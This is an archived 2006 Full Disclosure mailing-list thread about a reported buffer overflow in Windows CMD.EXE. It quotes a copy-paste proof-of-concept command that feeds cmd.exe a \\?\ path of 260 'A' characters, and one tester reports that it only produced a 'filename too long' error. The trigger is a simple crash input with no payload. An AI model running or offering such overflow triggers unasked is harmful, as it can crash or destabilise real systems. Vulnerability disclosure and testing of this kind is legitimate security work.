Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Windows Command Processor CMD.EXE Buffer Overflow
From: "Luis Alberto Cortes Zavala" <napasn () securitynation com>
Date: Fri, 20 Oct 2006 14:33:00 -0500

YEah! Buffer Overflow Windows XP SP2

I Hill debug this.

Luís Alberto Cortes Zavala
IT / Security Consultant
napa () securitynation com
http://www.securitynation.com



-----Mensaje original-----
De: listbounce () securityfocus com [mailto:listbounce () securityfocus com] En
nombre de The SNiFF
Enviado el: Viernes, 20 de Octubre de 2006 03:58 a.m.
Para: vuln-dev () securityfocus com
Asunto: Re: Windows Command Processor CMD.EXE Buffer Overflow

Copy-paste the following line in cmd.exe and execute it..
(it is a single command, has been split into multiple lines for
readability sake).

%COMSPEC% /K "dir

\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

(260 characters of 'A's)

Tried it on Win2k3 SP1:
C:\Documents and Settings\Administrator>%COMSPEC% /K 
"dir\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
System replied:
The filename or extension is too long. 



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]